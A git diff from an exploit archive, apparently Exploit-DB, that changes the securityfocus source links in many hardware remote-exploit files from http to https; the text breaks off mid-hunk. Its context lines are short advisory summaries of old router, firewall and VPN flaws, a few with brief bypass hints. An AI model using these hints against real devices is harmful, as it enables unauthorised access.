resources. diff --git a/exploits/hardware/remote/22394.txt b/exploits/hardware/remote/22394.txt index 696bc6cac..7531f3caa 100644 --- a/exploits/hardware/remote/22394.txt +++ b/exploits/hardware/remote/22394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7161/info +source: https://www.securityfocus.com/bid/7161/info An issue has been discovered in Check Point FW-1 syslog daemon when attempting to process a malicious, remotely supplied, syslog message. Specifically, some messages containing escape sequences are not properly filtered out. This may result in unpredictable behaviour by the Check Point syslog daemon. diff --git a/exploits/hardware/remote/22416.txt b/exploits/hardware/remote/22416.txt index 8dd8dbae4..644b29ffe 100644 --- a/exploits/hardware/remote/22416.txt +++ b/exploits/hardware/remote/22416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7176/info +source: https://www.securityfocus.com/bid/7176/info A vulnerability has been reported in 3Com RAS 1500 router that may allow attackers to access sensitive data. Specifically, RAS 1500 devices fail to carry out authentication when requests are made for various files that may contain sensitive information. diff --git a/exploits/hardware/remote/22453.txt b/exploits/hardware/remote/22453.txt index 8ffe4f40f..fd9f9acf9 100644 --- a/exploits/hardware/remote/22453.txt +++ b/exploits/hardware/remote/22453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7267/info +source: https://www.securityfocus.com/bid/7267/info The Netgear FM114P ProSafe Wireless Router is vulnerable to information disclosure. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can retrieve the username and password for the WAN interface. diff --git a/exploits/hardware/remote/22455.txt b/exploits/hardware/remote/22455.txt index deaf42e1b..4d482a32e 100644 --- a/exploits/hardware/remote/22455.txt +++ b/exploits/hardware/remote/22455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7270/info +source: https://www.securityfocus.com/bid/7270/info The Netgear FM114P allows certain ports to be blocked, both for external users attempting to enter the local network and for local users connecting to the WAN. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can cause a connection to be intitiated through a port that is normally blocked. diff --git a/exploits/hardware/remote/22480.txt b/exploits/hardware/remote/22480.txt index 1a9126102..4dbacf348 100644 --- a/exploits/hardware/remote/22480.txt +++ b/exploits/hardware/remote/22480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7317/info +source: https://www.securityfocus.com/bid/7317/info Linksys BEFVP4 VPN router has been reported prone to a sensitive information disclosure vulnerability. diff --git a/exploits/hardware/remote/22532.txt b/exploits/hardware/remote/22532.txt index 1746fcaa6..035defe55 100644 --- a/exploits/hardware/remote/22532.txt +++ b/exploits/hardware/remote/22532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7423/info +source: https://www.securityfocus.com/bid/7423/info When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. diff --git a/exploits/hardware/remote/22533.txt b/exploits/hardware/remote/22533.txt index a9abbb4c7..109d6a24b 100644 --- a/exploits/hardware/remote/22533.txt +++ b/exploits/hardware/remote/22533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7426/info +source: https://www.securityfocus.com/bid/7426/info It has been reported that Nokia IPSO does not properly handle some types of requests through Voyager. Because of this, an attacker with access to the interface may be able to view potentially sensitive information. diff --git a/exploits/hardware/remote/22626.txt b/exploits/hardware/remote/22626.txt index 686c5fac0..fb12d85e6 100644 --- a/exploits/hardware/remote/22626.txt +++ b/exploits/hardware/remote/22626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7652/info +source: https://www.securityfocus.com/bid/7652/info A vulnerability has been discovered in various Axis Communications products. By making a request for a specially formatted URL, it may be possible for remote users to access the administrative configuration interface without being prompted for authentication. diff --git a/exploits/hardware/remote/22898.txt b/exploits/hardware/remote/22898.txt index 4a4c1b267..4a825fff2 100644 --- a/exploits/hardware/remote/22898.txt +++ b/exploits/hardware/remote/22898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8183/info +source: https://www.securityfocus.com/bid/8183/info It has been reported that remote users may be able to obtain sensitive information from Asus ADSL routers. It is possible to request files from the built-in Web server that contain information such as usernames, passwords and other configuration information. diff --git a/exploits/hardware/remote/23212.txt b/exploits/hardware/remote/23212.txt index 23369c213..33f35a8f5 100644 --- a/exploits/hardware/remote/23212.txt +++ b/exploits/hardware/remote/23212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8755/info +source: https://www.securityfocus.com/bid/8755/info It has been reported that Cisco LEAP (Lightweight Extensible Authentication Protocol) is prone to a password disclosure weakness that may allow a remote user to steal user passwords. The issue may be exploited out by brute forcing user passwords using dictionary attacks. diff --git a/exploits/hardware/remote/23317.txt b/exploits/hardware/remote/23317.txt index a0df9c59d..cd17928af 100644 --- a/exploits/hardware/remote/23317.txt +++ b/exploits/hardware/remote/23317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8942/info +source: https://www.securityfocus.com/bid/8942/info It has been reported that FlexWATCH Network Video Server may be prone to an access validation error that may allow a remote attacker to gain administrative access to the system. The problem is reported to present itself when an attacker attempts to access the administrative interface using a specially crafted URL containing two slash '/' characters. diff --git a/exploits/hardware/remote/23376.txt b/exploits/hardware/remote/23376.txt index 8e2b3f39e..c979edcb8 100644 --- a/exploits/hardware/remote/23376.txt +++ b/exploits/hardware/remote/23376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23377.txt b/exploits/hardware/remote/23377.txt index 2c04eb967..fdbdcba16 100644 --- a/exploits/hardware/remote/23377.txt +++ b/exploits/hardware/remote/23377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23378.txt b/exploits/hardware/remote/23378.txt index 721034655..c2bb7e307 100644 --- a/exploits/hardware/remote/23378.txt +++ b/exploits/hardware/remote/23378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23379.txt b/exploits/hardware/remote/23379.txt index 3cd7ea104..58c5ab8cd 100644 --- a/exploits/hardware/remote/23379.txt +++ b/exploits/hardware/remote/23379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23527.txt b/exploits/hardware/remote/23527.txt index 7bdd94ba4..a6f4dcaf0 100644 --- a/exploits/hardware/remote/23527.txt +++ b/exploits/hardware/remote/23527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9373/info +source: https://www.securityfocus.com/bid/9373/info ZyWALL 10 firewalls are prone to cross-site scripting attacks via the web management interface of affected devices. An attacker could exploit this issue by enticing a victim user to follow a malicious link to a site hosting the software that contains embedded HTML and script code. The embedded code may be rendered in the web browser of the victim user. diff --git a/exploits/hardware/remote/23528.txt b/exploits/hardware/remote/23528.txt index be3277287..91d76d745 100644 --- a/exploits/hardware/remote/23528.txt +++ b/exploits/hardware/remote/23528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9374/info +source: https://www.securityfocus.com/bid/9374/info Edimax AR-6004 ADSL Routers are prone to cross-site scripting attacks via the web management interface of affected devices. An attacker could exploit this issue by enticing a victim user to follow a malicious link to a site hosting the software that contains embedded HTML and script code. The embedded code may be rendered in the web browser of the victim user. diff --git a/exploits/hardware/remote/23545.txt b/exploits/hardware/remote/23545.txt index c0c1bf706..4e6393180 100644 --- a/exploits/hardware/remote/23545.txt +++ b/exploits/hardware/remote/23545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9431/info +source: https://www.securityfocus.com/bid/9431/info The e-GAP appliance has been reported prone to a source code disclosure vulnerability. It has been reported that, when the affected appliance handles unexpected HTTP requests it may divulge the source code of the login script. The login page is used to build a simple form for collecting and submitting the username and the password to the e-Gap server. The authentication logic is not part of this page and cannot be viewed by the attacker. The information contained in the login page is not typically sensitive. diff --git a/exploits/hardware/remote/23721.txt b/exploits/hardware/remote/23721.txt index bdd2ac3e5..f261bec69 100644 --- a/exploits/hardware/remote/23721.txt +++ b/exploits/hardware/remote/23721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9688/info +source: https://www.securityfocus.com/bid/9688/info Linksys WAP55AG appliance has been reported prone to an insecure default configuration vulnerability. diff --git a/exploits/hardware/remote/23764.txt b/exploits/hardware/remote/23764.txt index 2d5135904..ef86661d4 100644 --- a/exploits/hardware/remote/23764.txt +++ b/exploits/hardware/remote/23764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9755/info +source: https://www.securityfocus.com/bid/9755/info A vulnerability has been reported to exist in the Symantec Gateway Security Web based management console that may allow a remote user to launch cross-site scripting attacks. diff --git a/exploits/hardware/remote/23808.txt b/exploits/hardware/remote/23808.txt index 58fae41c9..0b84fecde 100644 --- a/exploits/hardware/remote/23808.txt +++ b/exploits/hardware/remote/23808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9858/info +source: https://www.securityfocus.com/bid/9858/info The IP3 NetAccess Appliance is reported prone to a remote SQL-injection vulnerability. This issue is due to the application's failure to properly sanitize user input. diff --git a/exploits/hardware/remote/24065.java b/exploits/hardware/remote/24065.java index 4c17a0151..d2b44be36 100644 --- a/exploits/hardware/remote/24065.java +++ b/exploits/hardware/remote/24065.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10227/info +source: https://www.securityfocus.com/bid/10227/info Reportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability. This issue is due to a race condition error that allows a malicious programmer to send SMS messages from unsuspecting cellular telephone user's telephones while obscuring the confirmation request. diff --git a/exploits/hardware/remote/24115.c b/exploits/hardware/remote/24115.c index 6c05491c7..e50d89ebb 100644 --- a/exploits/hardware/remote/24115.c +++ b/exploits/hardware/remote/24115.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10329/info +// source: https://www.securityfocus.com/bid/10329/info It has been reported that the built-in DHCP server on these devices are prone to an information disclosure vulnerability. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device. diff --git a/exploits/hardware/remote/24140.txt b/exploits/hardware/remote/24140.txt index 1b9d1da63..4858e935e 100644 --- a/exploits/hardware/remote/24140.txt +++ b/exploits/hardware/remote/24140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10404/info +source: https://www.securityfocus.com/bid/10404/info It is reported that users may bypass Netgear RP114 content filter functionality. This can be accomplished by making a URI request string that is over 220 bytes in length. diff --git a/exploits/hardware/remote/24226.txt b/exploits/hardware/remote/24226.txt index b02c638ed..78a6e8da6 100644 --- a/exploits/hardware/remote/24226.txt +++ b/exploits/hardware/remote/24226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10587/info +source: https://www.securityfocus.com/bid/10587/info It is reported that the DI-614+, DI-704, and the DI-624 are susceptible to an HTML injection vulnerability in their DHCP log. diff --git a/exploits/hardware/remote/24230.txt b/exploits/hardware/remote/24230.txt index 4f68dc66f..39a5c02c4 100644 --- a/exploits/hardware/remote/24230.txt +++ b/exploits/hardware/remote/24230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10589/info +source: https://www.securityfocus.com/bid/10589/info BT Voyager 2000 Wireless ADSL Router is reported prone to a sensitive information disclosure vulnerability. diff --git a/exploits/hardware/remote/24681.txt b/exploits/hardware/remote/24681.txt index c4a10ecbc..5822aa9c1 100644 --- a/exploits/hardware/remote/24681.txt +++ b/exploits/hardware/remote/24681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11408/info +source: https://www.securityfocus.com/bid/11408/info 3Com 3CRADSL72 is reported prone to an information disclosure, and an authentication bypass vulnerability. This issue can allow a remote attacker to disclose sensitive information such as the router name, primary and secondary DNS servers, default gateway. Attackers could also reportedly gain administrative access to the router. diff --git a/exploits/hardware/remote/24760.txt b/exploits/hardware/remote/24760.txt index 51ebdccf7..fac3d5c90 100644 --- a/exploits/hardware/remote/24760.txt +++ b/exploits/hardware/remote/24760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11723/info +source: https://www.securityfocus.com/bid/11723/info ZyXEL Prestige router series is reported prone to an access validation vulnerability. The vulnerability exists because the firmware of the router fails to restrict access to a configuration page that is a part of the ZyXEL Prestige HTTP based remote administration service. diff --git a/exploits/hardware/remote/25359.txt b/exploits/hardware/remote/25359.txt index 89d8a872c..d69231508 100644 --- a/exploits/hardware/remote/25359.txt +++ b/exploits/hardware/remote/25359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13051/info +source: https://www.securityfocus.com/bid/13051/info A remote authentication bypass vulnerability affects Linksys WET11. This issue is due to a failure of the application to validate authentication credentials when processing password change requests. diff --git a/exploits/hardware/remote/25684.html b/exploits/hardware/remote/25684.html index b56f92552..619064c9e 100644 --- a/exploits/hardware/remote/25684.html +++ b/exploits/hardware/remote/25684.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13679/info +source: https://www.securityfocus.com/bid/13679/info Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances. diff --git a/exploits/hardware/remote/25949.pl b/exploits/hardware/remote/25949.pl index 2c9e1bac5..06c1fcd88 100755 --- a/exploits/hardware/remote/25949.pl +++ b/exploits/hardware/remote/25949.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14174/info +source: https://www.securityfocus.com/bid/14174/info Multiple Vendor VoIP Phones handle spoofed SIP status messages in an improper manner. This issue could potentially lead a to a denial of service condition against a server. diff --git a/exploits/hardware/remote/25966.txt b/exploits/hardware/remote/25966.txt index 5bebbccb4..3afe1bdde 100644 --- a/exploits/hardware/remote/25966.txt +++ b/exploits/hardware/remote/25966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14232/info +source: https://www.securityfocus.com/bid/14232/info Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists due to a lack of input sanitization that is performed before using attacker-controlled data in a 'system()' call. diff --git a/exploits/hardware/remote/26022.txt b/exploits/hardware/remote/26022.txt index 03798e975..511bda130 100644 --- a/exploits/hardware/remote/26022.txt +++ b/exploits/hardware/remote/26022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14364/info +source: https://www.securityfocus.com/bid/14364/info B-FOCuS Router 312+ is affected by a vulnerability that can allow unauthorized attackers to gain access to an affected device. diff --git a/exploits/hardware/remote/26168.txt b/exploits/hardware/remote/26168.txt index efd167777..e0b83de01 100644 --- a/exploits/hardware/remote/26168.txt +++ b/exploits/hardware/remote/26168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14595/info +source: https://www.securityfocus.com/bid/14595/info The Juniper Netscreen VPN implementation will identify valid usernames in IKE aggressive mode, when pre-shared key authentication is used. This allows for attackers to obtain a list of valid VPN users. With a valid username, an attacker can obtain hashed credentials against which a brute force attack may be performed. A successful crack would mean that the attacker has complete access to the network. diff --git a/exploits/hardware/remote/27203.pl b/exploits/hardware/remote/27203.pl index 23bd6f97b..e78f1d4cc 100755 --- a/exploits/hardware/remote/27203.pl +++ b/exploits/hardware/remote/27203.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16599/info +source: https://www.securityfocus.com/bid/16599/info Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering. diff --git a/exploits/hardware/remote/27319.txt b/exploits/hardware/remote/27319.txt index ab8396d84..0820020d5 100644 --- a/exploits/hardware/remote/27319.txt +++ b/exploits/hardware/remote/27319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16839/info +source: https://www.securityfocus.com/bid/16839/info The SpeedTouch 500 series are prone to a cross-site scripting vulnerability. This issue is due to a failure in the devices to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27452.txt b/exploits/hardware/remote/27452.txt index 84fdeaa1b..7810bc46c 100644 --- a/exploits/hardware/remote/27452.txt +++ b/exploits/hardware/remote/27452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17175/info +source: https://www.securityfocus.com/bid/17175/info FirePass 4100 SSL VPN is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27830.java b/exploits/hardware/remote/27830.java index db7cfd8e6..eb199fb80 100644 --- a/exploits/hardware/remote/27830.java +++ b/exploits/hardware/remote/27830.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17883/info +source: https://www.securityfocus.com/bid/17883/info Multiple Cisco products are susceptible to a content-filtering bypass vulnerability. This issue is due to a failure of the software to properly recognize HTTP request traffic. diff --git a/exploits/hardware/remote/27891.txt b/exploits/hardware/remote/27891.txt index 592c29f0c..bf21f7c8b 100644 --- a/exploits/hardware/remote/27891.txt +++ b/exploits/hardware/remote/27891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18019/info +source: https://www.securityfocus.com/bid/18019/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote authentication-bypass vulnerability. diff --git a/exploits/hardware/remote/27892.txt b/exploits/hardware/remote/27892.txt index 910a582f3..718ae39da 100644 --- a/exploits/hardware/remote/27892.txt +++ b/exploits/hardware/remote/27892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18022/info +source: https://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27893.txt b/exploits/hardware/remote/27893.txt index bab1e3dfa..f5229a7d1 100644 --- a/exploits/hardware/remote/27893.txt +++ b/exploits/hardware/remote/27893.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18022/info +source: https://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27894.txt b/exploits/hardware/remote/27894.txt index 683d12d45..526e7c9e0 100644 --- a/exploits/hardware/remote/27894.txt +++ b/exploits/hardware/remote/27894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18022/info +source: https://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27923.txt b/exploits/hardware/remote/27923.txt index 00649f778..b81b80210 100644 --- a/exploits/hardware/remote/27923.txt +++ b/exploits/hardware/remote/27923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18168/info +source: https://www.securityfocus.com/bid/18168/info The D-Link Airspot DSA-3100 Gateway device is prone to a cross-site scripting vulnerability. This issue is due to a failure to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/28245.pl b/exploits/hardware/remote/28245.pl index 7ccbc7fd3..c61471219 100755 --- a/exploits/hardware/remote/28245.pl +++ b/exploits/hardware/remote/28245.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19075/info +source: https://www.securityfocus.com/bid/19075/info Cisco Security Monitoring, Analysis and Response System (CS-MARS) is prone to a vulnerability that could permit the execution of arbitrary commands. diff --git a/exploits/hardware/remote/28847.txt b/exploits/hardware/remote/28847.txt index 3cca32d6d..5556db490 100644 --- a/exploits/hardware/remote/28847.txt +++ b/exploits/hardware/remote/28847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20689/info +source: https://www.securityfocus.com/bid/20689/info D-Link DSL-G624T devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/28848.txt b/exploits/hardware/remote/28848.txt index c3036e68d..a9888c7b8 100644 --- a/exploits/hardware/remote/28848.txt +++ b/exploits/hardware/remote/28848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20696/info +source: https://www.securityfocus.com/bid/20696/info INCA IM-204 devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/28888.txt b/exploits/hardware/remote/28888.txt index 0dacac0e0..eec2902d7 100644 --- a/exploits/hardware/remote/28888.txt +++ b/exploits/hardware/remote/28888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20834/info +source: https://www.securityfocus.com/bid/20834/info ECI Telecom's B-FOCuS ADSL2+ Combo332+ wireless router is prone to an information-disclosure vulnerability. The router's Web-Based Management interface fails to authenticate users before providing access to sensitive information. diff --git a/exploits/hardware/remote/29735.rb b/exploits/hardware/remote/29735.rb index acd14d11f..7433d78a4 100755 --- a/exploits/hardware/remote/29735.rb +++ b/exploits/hardware/remote/29735.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22923/info +source: https://www.securityfocus.com/bid/22923/info D-Link TFTP is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before storing it in a finite-sized buffer. diff --git a/exploits/hardware/remote/29945.txt b/exploits/hardware/remote/29945.txt index f98ec3596..95fb2f496 100644 --- a/exploits/hardware/remote/29945.txt +++ b/exploits/hardware/remote/29945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23802/info +source: https://www.securityfocus.com/bid/23802/info D-Link DSL-G624T is prone to a cross-site scripting vulnerability. This issue is due to a failure to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30164.txt b/exploits/hardware/remote/30164.txt index 276861991..dc9be4694 100644 --- a/exploits/hardware/remote/30164.txt +++ b/exploits/hardware/remote/30164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24374/info +source: https://www.securityfocus.com/bid/24374/info OfficeConnect Secure Router is prone to a cross-site scripting vulnerability. diff --git a/exploits/hardware/remote/30254.txt b/exploits/hardware/remote/30254.txt index 940af08a6..82e1cd256 100644 --- a/exploits/hardware/remote/30254.txt +++ b/exploits/hardware/remote/30254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24682/info +source: https://www.securityfocus.com/bid/24682/info Linksys Wireless-G ADSL Gateway is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30485.html b/exploits/hardware/remote/30485.html index 5729fde15..bb067bbfd 100644 --- a/exploits/hardware/remote/30485.html +++ b/exploits/hardware/remote/30485.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25262/info +source: https://www.securityfocus.com/bid/25262/info ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface. diff --git a/exploits/hardware/remote/30650.txt b/exploits/hardware/remote/30650.txt index 38fc86368..e5f7b572d 100644 --- a/exploits/hardware/remote/30650.txt +++ b/exploits/hardware/remote/30650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25987/info +source: https://www.securityfocus.com/bid/25987/info Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/hardware/remote/30652.txt b/exploits/hardware/remote/30652.txt index c1c9cce2d..80d3c6e29 100644 --- a/exploits/hardware/remote/30652.txt +++ b/exploits/hardware/remote/30652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26001/info +source: https://www.securityfocus.com/bid/26001/info Cisco IOS is prone to a remote buffer-overflow vulnerability in its LPD service because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/hardware/remote/30673.txt b/exploits/hardware/remote/30673.txt index 29cb17754..d638133ca 100644 --- a/exploits/hardware/remote/30673.txt +++ b/exploits/hardware/remote/30673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26073/info +source: https://www.securityfocus.com/bid/26073/info NETGEAR ProSafe SSL VPN Concentrator 25-SSL312 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30740.html b/exploits/hardware/remote/30740.html index 1d6c466ce..11436f763 100644 --- a/exploits/hardware/remote/30740.html +++ b/exploits/hardware/remote/30740.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26333/info +source: https://www.securityfocus.com/bid/26333/info BT Home Hub is prone to an authentication-bypass vulnerability. diff --git a/exploits/hardware/remote/30755.txt b/exploits/hardware/remote/30755.txt index c7a020332..5fef5c0a5 100644 --- a/exploits/hardware/remote/30755.txt +++ b/exploits/hardware/remote/30755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26412/info +source: https://www.securityfocus.com/bid/26412/info F5 FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30833.html b/exploits/hardware/remote/30833.html index fda561271..18270f685 100644 --- a/exploits/hardware/remote/30833.html +++ b/exploits/hardware/remote/30833.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26659/info +source: https://www.securityfocus.com/bid/26659/info F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30834.txt b/exploits/hardware/remote/30834.txt index d7b56c994..1f61e3531 100644 --- a/exploits/hardware/remote/30834.txt +++ b/exploits/hardware/remote/30834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26661/info +source: https://www.securityfocus.com/bid/26661/info F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30882.txt b/exploits/hardware/remote/30882.txt index d53c4e473..d448cd06e 100644 --- a/exploits/hardware/remote/30882.txt +++ b/exploits/hardware/remote/30882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26808/info +source: https://www.securityfocus.com/bid/26808/info Thomson SpeedTouch 716 is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30935.txt b/exploits/hardware/remote/30935.txt index 9abf5abd5..041b52c61 100644 --- a/exploits/hardware/remote/30935.txt +++ b/exploits/hardware/remote/30935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27024/info +source: https://www.securityfocus.com/bid/27024/info ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface. diff --git a/exploits/hardware/remote/31013.txt b/exploits/hardware/remote/31013.txt index 9a82fc702..e1648fcbe 100644 --- a/exploits/hardware/remote/31013.txt +++ b/exploits/hardware/remote/31013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27246/info +source: https://www.securityfocus.com/bid/27246/info Multiple 2Wire routers are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/31024.txt b/exploits/hardware/remote/31024.txt index 673098b63..a869080af 100644 --- a/exploits/hardware/remote/31024.txt +++ b/exploits/hardware/remote/31024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27272/info +source: https://www.securityfocus.com/bid/27272/info F5 BIG-IP is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31026.pl b/exploits/hardware/remote/31026.pl index bd6e29a95..4d6602194 100755 --- a/exploits/hardware/remote/31026.pl +++ b/exploits/hardware/remote/31026.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27276/info +source: https://www.securityfocus.com/bid/27276/info Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering. diff --git a/exploits/hardware/remote/31031.txt b/exploits/hardware/remote/31031.txt index 3e327cf28..cc8cf645d 100644 --- a/exploits/hardware/remote/31031.txt +++ b/exploits/hardware/remote/31031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27309/info +source: https://www.securityfocus.com/bid/27309/info 8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters. diff --git a/exploits/hardware/remote/31078.txt b/exploits/hardware/remote/31078.txt index 69e826a89..999997b13 100644 --- a/exploits/hardware/remote/31078.txt +++ b/exploits/hardware/remote/31078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27516/info +source: https://www.securityfocus.com/bid/27516/info Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions. diff --git a/exploits/hardware/remote/31132.txt b/exploits/hardware/remote/31132.txt index 1dc0e3d7f..3e72d94ab 100644 --- a/exploits/hardware/remote/31132.txt +++ b/exploits/hardware/remote/31132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27718/info +source: https://www.securityfocus.com/bid/27718/info ExtremeZ-IP File and Print servers are prone to multiple vulnerabilities including denial-of-service and information-disclosure issues. diff --git a/exploits/hardware/remote/31133.txt b/exploits/hardware/remote/31133.txt index 1e1c1d07a..6925005e3 100644 --- a/exploits/hardware/remote/31133.txt +++ 